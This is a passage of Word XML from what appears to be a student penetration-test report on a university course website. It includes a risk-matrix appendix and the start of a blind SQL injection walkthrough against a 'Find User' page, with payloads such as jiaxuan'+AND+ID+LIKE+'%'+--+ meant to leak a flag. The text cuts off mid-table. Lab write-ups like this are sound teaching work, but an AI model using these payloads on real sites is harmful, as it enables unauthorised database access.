            </w:r>
            <w:bookmarkEnd w:id="35"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="572A94EE" w14:textId="3F70DEE8" w:rsidR="00FD2C45" w:rsidRDefault="007A5547" w:rsidP="0093170A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">1] Lecture 6 </w:t>
            </w:r>
            <w:r w:rsidR="007D7D0E">
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r>
              <w:t>SQL Wildcard</w:t>
            </w:r>
            <w:r w:rsidR="007D7D0E">
              <w:t xml:space="preserve"> slides</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD2C45" w14:paraId="6B9B27F1" w14:textId="77777777" w:rsidTr="0093170A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7C7DF292" w14:textId="77777777" w:rsidR="00FD2C45" w:rsidRDefault="00FD2C45" w:rsidP="0093170A">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="36" w:name="_Toc71488353"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:bookmarkEnd w:id="36"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="06CFC3E7" w14:textId="2BB68DAA" w:rsidR="00FD2C45" w:rsidRDefault="00381A8D" w:rsidP="0093170A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The website can use </w:t>
            </w:r>
            <w:r w:rsidR="002917EE">
              <w:t xml:space="preserve">a </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">blacklist to avoid special characters, such as %. The website can also assign different </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>apikey</w:t>
            </w:r>
            <w:r w:rsidR="002917EE">
              <w:t>s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> to each API for access</w:t>
            </w:r>
            <w:r w:rsidR="002917EE">
              <w:t xml:space="preserve"> permission</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A583D24" w14:textId="77777777" w:rsidR="00FD2C45" w:rsidRDefault="00FD2C45" w:rsidP="00FD2C45"/>
    <w:p w14:paraId="3D3F9A72" w14:textId="253027F6" w:rsidR="00B97362" w:rsidRDefault="00FD2C45">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C14DCE8" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc71488354"/>
      <w:bookmarkStart w:id="38" w:name="A1"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix I - Risk Matrix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:p w14:paraId="576B93C9" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>
    <w:p w14:paraId="55116840" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:r>
        <w:t>All risks assessed in this report are in line with the ISO31000 Risk Matrix detailed below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D93E1D" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>
    <w:p w14:paraId="0430905E" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="38B3734A" wp14:editId="575AB68F">
            <wp:extent cx="5734050" cy="1866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4050" cy="1866900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="561F119B" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>
    <w:p w14:paraId="00F34EA4" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C8933" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc71488355"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix 2 - Additional Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="1346AAE6" w14:textId="77777777" w:rsidR="002917EE" w:rsidRDefault="002917EE">
      <w:bookmarkStart w:id="40" w:name="A2_s1"/>
    </w:p>
    <w:p w14:paraId="6F071258" w14:textId="2C214451" w:rsidR="002917EE" w:rsidRDefault="002C3D4B" w:rsidP="0088572A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc71488356"/>
      <w:r w:rsidRPr="002C3D4B">
        <w:t>Section 1 – SQL Injection Exploitation Walkthrough</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:p w14:paraId="679DCF29" w14:textId="77777777" w:rsidR="002917EE" w:rsidRDefault="002917EE"/>
    <w:p w14:paraId="5A91F25A" w14:textId="27118EBE" w:rsidR="002C3D4B" w:rsidRDefault="002C3D4B">
      <w:r w:rsidRPr="002C3D4B">
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL injection vulnerability lies in the web application’s Find User functionality. This can be accessed by authenticated users from ether the find page</w:t>
      </w:r>
      <w:r w:rsidR="00C55B37">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="00C55B37" w:rsidRPr="004134EC">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>http://assignment-hermes.unimelb.life/find.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C55B37">
        <w:t xml:space="preserve">) or the Find User bar at the top right of every internal page (or the right-hand side menu bar when the browser window has been reduced to a certain size). If I search my </w:t>
      </w:r>
      <w:r w:rsidR="009750A5">
        <w:t xml:space="preserve">own </w:t>
      </w:r>
      <w:r w:rsidR="00C55B37">
        <w:t>username “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002917EE">
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidR="00C55B37">
        <w:t>iaxuan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C55B37">
        <w:t xml:space="preserve">”, this query is passed as parameters in a GET request to URL </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="00C55B37" w:rsidRPr="004134EC">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>http://assignment-hermes.unimelb.life/find-user.php?username=jiaxuan</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C55B37">
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r w:rsidR="00F24964">
        <w:t xml:space="preserve">the response from this URL will be “true” (Fig 1.1), while on the website, </w:t>
      </w:r>
      <w:r w:rsidR="00C55B37">
        <w:t xml:space="preserve">“User Found!” </w:t>
      </w:r>
      <w:r w:rsidR="00F24964">
        <w:t>will be d</w:t>
      </w:r>
      <w:r w:rsidR="00C55B37">
        <w:t>isplayed on the right side of the page(Fig 1.</w:t>
      </w:r>
      <w:r w:rsidR="00F24964">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C55B37">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C57BFD" w14:textId="4E8FA86B" w:rsidR="00F24964" w:rsidRDefault="00F24964">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>f there are no such data in the database, the response will be “No data was fetched” (Fig 1.3), and display “User Not Found” on the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76774454" w14:textId="293A1A40" w:rsidR="00F24964" w:rsidRDefault="00F24964" w:rsidP="00324D19">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AC517A3" wp14:editId="325860A7">
            <wp:extent cx="5478449" cy="740249"/>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588081" cy="755062"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="350DE32A" w14:textId="597A61DC" w:rsidR="00F24964" w:rsidRPr="00F24964" w:rsidRDefault="00F24964" w:rsidP="00F24964">
      <w:pPr>
        <w:ind w:left="3600" w:firstLineChars="200" w:firstLine="442"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC2AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2AD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ig 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E39C11" w14:textId="03609B59" w:rsidR="002C3D4B" w:rsidRDefault="002C3D4B" w:rsidP="00324D19">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33C10E1A" wp14:editId="1BB99B2C">
            <wp:extent cx="4420925" cy="1517872"/>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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4464434" cy="1532810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C34689F" w14:textId="783CE4CA" w:rsidR="00C55B37" w:rsidRDefault="00C55B37" w:rsidP="00EC2AD2">
      <w:pPr>
        <w:ind w:left="3600" w:firstLineChars="200" w:firstLine="442"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC2AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2AD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ig 1.</w:t>
      </w:r>
      <w:r w:rsidR="00F24964">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53220401" w14:textId="730EB03E" w:rsidR="00F24964" w:rsidRDefault="00F24964" w:rsidP="00324D19">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="528B9394" wp14:editId="3A5A024A">
            <wp:extent cx="5438693" cy="73066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84005" cy="736748"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="158C30B0" w14:textId="7AE19D8D" w:rsidR="00F24964" w:rsidRDefault="00F24964" w:rsidP="00F24964">
      <w:pPr>
        <w:ind w:left="3600" w:firstLineChars="200" w:firstLine="442"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC2AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2AD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ig 1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C506312" w14:textId="17879DBE" w:rsidR="00EC2AD2" w:rsidRDefault="00EC2AD2" w:rsidP="00EC2AD2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hen the input is not proper like syntax error, the webpage will pop up “Hacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>!”</w:t>
      </w:r>
      <w:r w:rsidR="009750A5">
        <w:t xml:space="preserve">. For example, if I just input </w:t>
      </w:r>
      <w:r w:rsidR="005C7E00">
        <w:t xml:space="preserve">one apostrophe </w:t>
      </w:r>
      <w:r w:rsidR="009750A5">
        <w:t xml:space="preserve">“’”, it will show me “hacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009750A5">
        <w:t>dected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009750A5">
        <w:t xml:space="preserve">!” </w:t>
      </w:r>
      <w:r>
        <w:t>(Fig1.</w:t>
      </w:r>
      <w:r w:rsidR="00F24964">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D44FCA" w14:textId="6D136850" w:rsidR="00EC2AD2" w:rsidRDefault="00EC2AD2" w:rsidP="00324D19">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C95C904" wp14:editId="505D51A2">
            <wp:extent cx="3466769" cy="1465956"/>
            <wp:effectExtent l="0" t="0" r="635" b="127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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3509449" cy="1484004"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4893EE82" w14:textId="6383B3A5" w:rsidR="00EC2AD2" w:rsidRDefault="00EC2AD2" w:rsidP="00EC2AD2">
      <w:pPr>
        <w:ind w:left="3600" w:firstLineChars="200" w:firstLine="442"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC2AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2AD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ig 1.</w:t>
      </w:r>
      <w:r w:rsidR="00F24964">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BCEEF1" w14:textId="34E54E37" w:rsidR="009750A5" w:rsidRDefault="00185948" w:rsidP="00EC2AD2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rom the output, we can gain information from the three types of information: User Found, User Not Found, or Hacker detected. If it </w:t>
      </w:r>
      <w:r w:rsidR="002917EE">
        <w:t>shows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hacker detected, there are syntax error occurs when a query sent to the database, such as wrong </w:t>
      </w:r>
      <w:r w:rsidR="00A4641D">
        <w:t xml:space="preserve">number of </w:t>
      </w:r>
      <w:r>
        <w:t>output lines, or wrong name of columns. When User not found, it only means that there is no query data in the database</w:t>
      </w:r>
      <w:r w:rsidR="005D68B9">
        <w:t>. When user found, it means there is what we want in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF6698C" w14:textId="77777777" w:rsidR="00DA1798" w:rsidRDefault="00DA1798" w:rsidP="00EC2AD2"/>
    <w:p w14:paraId="386188EC" w14:textId="09FDE53F" w:rsidR="00EC2AD2" w:rsidRDefault="00EC2AD2" w:rsidP="00EC2AD2">
      <w:r w:rsidRPr="00EC2AD2">
        <w:t>Exploit 1: Leaking sensitive information (i.e. the flag)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="559"/>
        <w:gridCol w:w="4965"/>
        <w:gridCol w:w="3495"/>
      </w:tblGrid>
      <w:tr w:rsidR="00324D19" w14:paraId="3238DC5C" w14:textId="77777777" w:rsidTr="00D347F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57C0DF66" w14:textId="2FE45A71" w:rsidR="007E3FBA" w:rsidRPr="00EC2AD2" w:rsidRDefault="00EC2AD2" w:rsidP="00EC2AD2">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC2AD2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC2AD2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TEP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D472200" w14:textId="4EABBB19" w:rsidR="00EC2AD2" w:rsidRPr="00EC2AD2" w:rsidRDefault="00EC2AD2" w:rsidP="00EC2AD2">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC2AD2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC2AD2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ayload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CF01A96" w14:textId="4D69BF54" w:rsidR="00EC2AD2" w:rsidRPr="00EC2AD2" w:rsidRDefault="00EC2AD2" w:rsidP="00EC2AD2">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC2AD2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC2AD2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>planation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324D19" w14:paraId="0251C3BB" w14:textId="77777777" w:rsidTr="00D347F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A6A9687" w14:textId="512DEFA5" w:rsidR="00EC2AD2" w:rsidRDefault="00EC2AD2" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="761DA277" w14:textId="7151D77D" w:rsidR="009750A5" w:rsidRDefault="00FE19C5" w:rsidP="00FE19C5">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>j</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE19C5">
              <w:t>iaxuan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FE19C5">
              <w:t>'+--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F70B6DE" w14:textId="01B99ECF" w:rsidR="00EC2AD2" w:rsidRDefault="009750A5" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="490E2C9D" wp14:editId="318C3491">
                  <wp:extent cx="2089603" cy="97801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0047" cy="1034383"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="69EE9EDF" w14:textId="3EB9C30B" w:rsidR="009750A5" w:rsidRDefault="009750A5" w:rsidP="00FE19C5">
            <w:pPr>
              <w:ind w:left="110" w:hangingChars="50" w:hanging="110"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">his output shows </w:t>
            </w:r>
            <w:r w:rsidR="00FE19C5">
              <w:t>user found. It means that</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> we can use “+--+” for comment in the database used by this website.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324D19" w14:paraId="3508477B" w14:textId="77777777" w:rsidTr="00D347F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15CE93EF" w14:textId="0B276334" w:rsidR="00EC2AD2" w:rsidRDefault="009750A5" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="310DF7BE" w14:textId="25310171" w:rsidR="007E3FBA" w:rsidRDefault="00FE19C5" w:rsidP="00EC2AD2">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FE19C5">
              <w:t>jiaxuan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FE19C5">
              <w:t>'+AND+ID+LIKE+'%'+--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FE5FC2D" w14:textId="684F6F6A" w:rsidR="00EC2AD2" w:rsidRDefault="007E3FBA" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74ED9E29" wp14:editId="09BDE7B1">
                  <wp:extent cx="2135884" cy="9223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3377" cy="981726"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidR="009750A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidR="009750A5">
              <w:t xml:space="preserve">he website </w:t>
            </w:r>
            <w:r w:rsidR="00185948">
              <w:t>does not pop</w:t>
            </w:r>
            <w:r w:rsidR="005D68B9">
              <w:t xml:space="preserve"> up</w:t>
            </w:r>
            <w:r w:rsidR="00185948">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005D68B9">
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidR="00185948">
              <w:t>hacker detected</w:t>
            </w:r>
            <w:r w:rsidR="005D68B9">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidR="00185948">
              <w:t>, Which means that there is</w:t>
            </w:r>
            <w:r w:rsidR="005D68B9">
              <w:t xml:space="preserve"> a “ID” column in the </w:t>
            </w:r>
            <w:r>
              <w:t>table</w:t>
            </w:r>
            <w:r w:rsidR="005D68B9">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324D19" w14:paraId="090E0917" w14:textId="77777777" w:rsidTr="00D347F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19AAFA59" w14:textId="4B6D8D4F" w:rsidR="00EC2AD2" w:rsidRDefault="007E3FBA" w:rsidP="00EC2AD2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4965" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F52F8CE" w14:textId="7C84CA96" w:rsidR="00EC2AD2" w:rsidRDefault="00FE19C5" w:rsidP="00FE19C5">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FE19C5">
              <w:t>jiaxuan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
